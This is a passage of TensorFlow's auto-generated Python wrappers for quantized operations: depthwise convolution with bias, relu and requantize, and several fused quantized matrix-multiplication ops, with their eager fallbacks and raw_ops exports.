The float value that the maximum quantized input value represents.
min_filter: A `Tensor` of type `float32`.
The float value that the minimum quantized filter value represents.
max_filter: A `Tensor` of type `float32`.
The float value that the maximum quantized filter value represents.
min_freezed_output: A `Tensor` of type `float32`.
The minimum float value of the output tensor.
max_freezed_output: A `Tensor` of type `float32`.
The maximum float value of the output tensor.
strides: A list of `ints`. List of stride values.
padding: A `string` from: `"SAME", "VALID"`.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
The type of the output.
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
List of dilation values.
padding_list: An optional list of `ints`. Defaults to `[]`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (output, min_output, max_output).
output: A `Tensor` of type `out_type`.
min_output: A `Tensor` of type `float32`.
max_output: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", name,
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, "out_type", out_type,
"strides", strides, "padding", padding, "dilations", dilations,
"padding_list", padding_list)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_depthwise_conv2d_with_bias_and_relu_and_requantize_eager_fallback(
input, filter, bias, min_input, max_input, min_filter, max_filter,
min_freezed_output, max_freezed_output, out_type=out_type,
strides=strides, padding=padding, dilations=dilations,
padding_list=padding_list, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", input=input,
filter=filter,
bias=bias,
min_input=min_input,
max_input=max_input,
min_filter=min_filter,
max_filter=max_filter,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
strides=strides,
padding=padding,
out_type=out_type,
dilations=dilations,
padding_list=padding_list,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "Tfilter",
_op._get_attr_type("Tfilter"), "Tbias",
_op._get_attr_type("Tbias"), "out_type",
_op._get_attr_type("out_type"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"dilations", _op.get_attr("dilations"), "padding_list",
_op.get_attr("padding_list"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize = tf_export("raw_ops.QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize")(_ops.to_raw_op(quantized_depthwise_conv2d_with_bias_and_relu_and_requantize))
def quantized_depthwise_conv2d_with_bias_and_relu_and_requantize_eager_fallback(input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output, strides, padding, out_type, dilations, padding_list, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
if padding_list is None:
padding_list = []
if not isinstance(padding_list, (list, tuple)):
raise TypeError(
"Expected list for 'padding_list' argument to "
"'quantized_depthwise_conv2d_with_bias_and_relu_and_requantize' Op, not %r." % padding_list)
padding_list = [_execute.make_int(_i, "padding_list") for _i in padding_list]
_attr_Tinput, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tfilter, (filter,) = _execute.args_to_matching_eager([filter], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
min_filter = _ops.convert_to_tensor(min_filter, _dtypes.float32)
max_filter = _ops.convert_to_tensor(max_filter, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [input, filter, bias, min_input, max_input, min_filter, max_filter, min_freezed_output, max_freezed_output]
_attrs = ("Tinput", _attr_Tinput, "Tfilter", _attr_Tfilter, "Tbias",
_attr_Tbias, "out_type", out_type, "strides", strides, "padding", padding,
"dilations", dilations, "padding_list", padding_list)
_result = _execute.execute(b"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize",
3, inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedDepthwiseConv2DWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedDepthwiseConv2DWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
_QuantizedMatMulWithBiasOutput = collections.namedtuple(
"QuantizedMatMulWithBias",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias(a, b, bias, min_a, max_a, min_b, max_b, Toutput=_dtypes.qint32, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""Performs a quantized matrix multiplication of `a` by the matrix `b` with bias
add.
The inputs must be two-dimensional matrices and 1D bias vector. And the inner
dimension of `a` (after being transposed if `transpose_a` is non-zero) must
match the outer dimension of `b` (after being transposed if `transposed_b` is
non-zero). Then do broadcast add operation with bias values on the matrix
multiplication result. The bias size must match inner dimension of `b`.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied. Must be a two-dimensional tensor of type `quint8`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied and must be a two-dimensional tensor of type `qint8`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
A 1D bias tensor with size matching inner dimension of `b` (after being
transposed if `transposed_b` is non-zero).
min_a: A `Tensor` of type `float32`.
The float value that the lowest quantized `a` value represents.
max_a: A `Tensor` of type `float32`.
The float value that the highest quantized `a` value represents.
min_b: A `Tensor` of type `float32`.
The float value that the lowest quantized `b` value represents.
max_b: A `Tensor` of type `float32`.
The float value that the highest quantized `b` value represents.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
transpose_a: An optional `bool`. Defaults to `False`.
If true, `a` is transposed before multiplication.
transpose_b: An optional `bool`. Defaults to `False`.
If true, `b` is transposed before multiplication.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
Input data quantization mode. Either MIN_FIRST(default) or SCALED.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBias", name, a, b, bias, min_a, max_a,
min_b, max_b, "Toutput", Toutput, "transpose_a", transpose_a,
"transpose_b", transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, Toutput=Toutput,
transpose_a=transpose_a, transpose_b=transpose_b,
input_quant_mode=input_quant_mode, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBias", a=a, b=b, bias=bias, min_a=min_a,
max_a=max_a, min_b=min_b, max_b=max_b,
Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasOutput._make(_result)
return _result
QuantizedMatMulWithBias = tf_export("raw_ops.QuantizedMatMulWithBias")(_ops.to_raw_op(quantized_mat_mul_with_bias))
def quantized_mat_mul_with_bias_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBias", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBias", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasOutput._make(_result)
return _result
def quantized_mat_mul_with_bias_and_dequantize(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""TODO: add doc.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
min_a: A `Tensor` of type `float32`.
max_a: A `Tensor` of type `float32`.
min_b: A `Tensor` of type `float32`.
max_b: A `Tensor` of type `float32`.
min_freezed_output: A `Tensor` of type `float32`.
max_freezed_output: A `Tensor` of type `float32`.
Toutput: A `tf.DType` from: `tf.float32`.
transpose_a: An optional `bool`. Defaults to `False`.
transpose_b: An optional `bool`. Defaults to `False`.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `Toutput`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndDequantize", name, a, b, bias, min_a,
max_a, min_b, max_b, min_freezed_output, max_freezed_output,
"Toutput", Toutput, "transpose_a", transpose_a, "transpose_b",
transpose_b, "input_quant_mode", input_quant_mode)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_dequantize_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output,
max_freezed_output, Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b, input_quant_mode=input_quant_mode,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndDequantize", a=a, b=b, bias=bias,
min_a=min_a, max_a=max_a,
min_b=min_b, max_b=max_b,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndDequantize", _inputs_flat, _attrs, _result)
_result, = _result
return _result
QuantizedMatMulWithBiasAndDequantize = tf_export("raw_ops.QuantizedMatMulWithBiasAndDequantize")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_dequantize))
def quantized_mat_mul_with_bias_and_dequantize_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_Tbias, (bias,) = _execute.args_to_matching_eager([bias], ctx, [_dtypes.float32, _dtypes.qint32, ])
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
min_freezed_output = _ops.convert_to_tensor(min_freezed_output, _dtypes.float32)
max_freezed_output = _ops.convert_to_tensor(max_freezed_output, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Tbias", _attr_Tbias, "Toutput",
Toutput, "transpose_a", transpose_a, "transpose_b", transpose_b,
"input_quant_mode", input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndDequantize", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndDequantize", _inputs_flat, _attrs, _result)
_result, = _result
return _result
_QuantizedMatMulWithBiasAndReluOutput = collections.namedtuple(
"QuantizedMatMulWithBiasAndRelu",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias_and_relu(a, b, bias, min_a, max_a, min_b, max_b, Toutput=_dtypes.qint32, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""Perform a quantized matrix multiplication of `a` by the matrix `b` with bias
add and relu fusion.
The inputs must be two-dimensional matrices and 1D bias vector. And the inner
dimension of `a` (after being transposed if `transpose_a` is non-zero) must
match the outer dimension of `b` (after being transposed if `transposed_b` is
non-zero). Then do broadcast add operation with bias values on the matrix
multiplication result. The bias size must match inner dimension of `b`. Then do
relu activation to get non-negative result.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied. Must be a two-dimensional tensor of type `quint8`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied and must be a two-dimensional tensor of type `qint8`.
bias: A `Tensor` of type `float32`.
A 1D bias tensor with size matching with inner dimension of `b` (after being
transposed if `transposed_b` is non-zero).
min_a: A `Tensor` of type `float32`.
The float value that the lowest quantized `a` value represents.
max_a: A `Tensor` of type `float32`.
The float value that the highest quantized `a` value represents.
min_b: A `Tensor` of type `float32`.
The float value that the lowest quantized `b` value represents.
max_b: A `Tensor` of type `float32`.
The float value that the highest quantized `b` value represents.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.qint32`.
transpose_a: An optional `bool`. Defaults to `False`.
If true, `a` is transposed before multiplication.
transpose_b: An optional `bool`. Defaults to `False`.
If true, `b` is transposed before multiplication.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
Input data quantization mode. Either MIN_FIRST(default) or SCALED.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndRelu", name, a, b, bias, min_a,
max_a, min_b, max_b, "Toutput", Toutput, "transpose_a", transpose_a,
"transpose_b", transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasAndReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_relu_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, Toutput=Toutput,
transpose_a=transpose_a, transpose_b=transpose_b,
input_quant_mode=input_quant_mode, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndRelu", a=a, b=b, bias=bias, min_a=min_a,
max_a=max_a, min_b=min_b,
max_b=max_b, Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Toutput", _op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluOutput._make(_result)
return _result
QuantizedMatMulWithBiasAndRelu = tf_export("raw_ops.QuantizedMatMulWithBiasAndRelu")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_relu))
def quantized_mat_mul_with_bias_and_relu_eager_fallback(a, b, bias, min_a, max_a, min_b, max_b, Toutput, transpose_a, transpose_b, input_quant_mode, name, ctx):
if Toutput is None:
Toutput = _dtypes.qint32
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_attr_T1, (a,) = _execute.args_to_matching_eager([a], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
_attr_T2, (b,) = _execute.args_to_matching_eager([b], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
bias = _ops.convert_to_tensor(bias, _dtypes.float32)
min_a = _ops.convert_to_tensor(min_a, _dtypes.float32)
max_a = _ops.convert_to_tensor(max_a, _dtypes.float32)
min_b = _ops.convert_to_tensor(min_b, _dtypes.float32)
max_b = _ops.convert_to_tensor(max_b, _dtypes.float32)
_inputs_flat = [a, b, bias, min_a, max_a, min_b, max_b]
_attrs = ("T1", _attr_T1, "T2", _attr_T2, "Toutput", Toutput, "transpose_a",
transpose_a, "transpose_b", transpose_b, "input_quant_mode",
input_quant_mode)
_result = _execute.execute(b"QuantizedMatMulWithBiasAndRelu", 3,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMatMulWithBiasAndRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluOutput._make(_result)
return _result
_QuantizedMatMulWithBiasAndReluAndRequantizeOutput = collections.namedtuple(
"QuantizedMatMulWithBiasAndReluAndRequantize",
["out", "min_out", "max_out"])
def quantized_mat_mul_with_bias_and_relu_and_requantize(a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output, Toutput=_dtypes.quint8, transpose_a=False, transpose_b=False, input_quant_mode="MIN_FIRST", name=None):
r"""Perform a quantized matrix multiplication of `a` by the matrix `b` with bias
add and relu and requantize fusion.
The inputs must be two-dimensional matrices and 1D bias vector. And the inner
dimension of `a` (after being transposed if `transpose_a` is non-zero) must
match the outer dimension of `b` (after being transposed if `transposed_b` is
non-zero). Then do broadcast add operation with bias values on the matrix
multiplication result. The bias size must match inner dimension of `b`. Then do
relu activation to get non-negative result. Then do requantize operation to get
final uint8 result.
Args:
a: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied. Must be a two-dimensional tensor of type `quint8`.
b: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
A matrix to be multiplied and must be a two-dimensional tensor of type `qint8`.
bias: A `Tensor`. Must be one of the following types: `float32`, `qint32`.
A 1D bias tensor with size matching with inner dimension of `b` (after being
transposed if `transposed_b` is non-zero).
min_a: A `Tensor` of type `float32`.
The float value that the lowest quantized `a` value represents.
max_a: A `Tensor` of type `float32`.
The float value that the highest quantized `a` value represents.
min_b: A `Tensor` of type `float32`.
The float value that the lowest quantized `b` value represents.
max_b: A `Tensor` of type `float32`.
The float value that the highest quantized `b` value represents.
min_freezed_output: A `Tensor` of type `float32`.
The float value that the highest quantized output value after requantize.
max_freezed_output: A `Tensor` of type `float32`.
Toutput: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
transpose_a: An optional `bool`. Defaults to `False`.
If true, `a` is transposed before multiplication.
transpose_b: An optional `bool`. Defaults to `False`.
If true, `b` is transposed before multiplication.
input_quant_mode: An optional `string` from: `"MIN_FIRST", "SCALED"`. Defaults to `"MIN_FIRST"`.
Input data quantization mode. Either MIN_FIRST(default) or SCALED.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (out, min_out, max_out).
out: A `Tensor` of type `Toutput`.
min_out: A `Tensor` of type `float32`.
max_out: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedMatMulWithBiasAndReluAndRequantize", name, a, b, bias,
min_a, max_a, min_b, max_b, min_freezed_output, max_freezed_output,
"Toutput", Toutput, "transpose_a", transpose_a, "transpose_b",
transpose_b, "input_quant_mode", input_quant_mode)
_result = _QuantizedMatMulWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_mat_mul_with_bias_and_relu_and_requantize_eager_fallback(
a, b, bias, min_a, max_a, min_b, max_b, min_freezed_output,
max_freezed_output, Toutput=Toutput, transpose_a=transpose_a,
transpose_b=transpose_b, input_quant_mode=input_quant_mode,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if Toutput is None:
Toutput = _dtypes.quint8
Toutput = _execute.make_type(Toutput, "Toutput")
if transpose_a is None:
transpose_a = False
transpose_a = _execute.make_bool(transpose_a, "transpose_a")
if transpose_b is None:
transpose_b = False
transpose_b = _execute.make_bool(transpose_b, "transpose_b")
if input_quant_mode is None:
input_quant_mode = "MIN_FIRST"
input_quant_mode = _execute.make_str(input_quant_mode, "input_quant_mode")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedMatMulWithBiasAndReluAndRequantize", a=a, b=b, bias=bias,
min_a=min_a,
max_a=max_a,
min_b=min_b,
max_b=max_b,
min_freezed_output=min_freezed_output,
max_freezed_output=max_freezed_output,
Toutput=Toutput,
transpose_a=transpose_a,
transpose_b=transpose_b,
input_quant_mode=input_quant_mode,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T1", _op._get_attr_type("T1"), "T2", _op._get_attr_type("T2"),
"Tbias", _op._get_attr_type("Tbias"), "Toutput",
_op._get_attr_type("Toutput"), "transpose_a",
_op._get_attr_bool("transpose_a"), "transpose_b",
_op._get_attr_bool("transpose_b"), "input_quant_mode",
_op.get_attr("input_quant_mode"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMatMulWithBiasAndReluAndRequantize", _inputs_flat, _attrs, _result)
_result = _QuantizedMatMulWithBiasAndReluAndRequantizeOutput._make(_result)
return _result
QuantizedMatMulWithBiasAndReluAndRequantize = tf_export("raw_ops.QuantizedMatMulWithBiasAndReluAndRequantize")(_ops.to_raw_op(quantized_mat_mul_with_bias_and_relu_and_requantize))
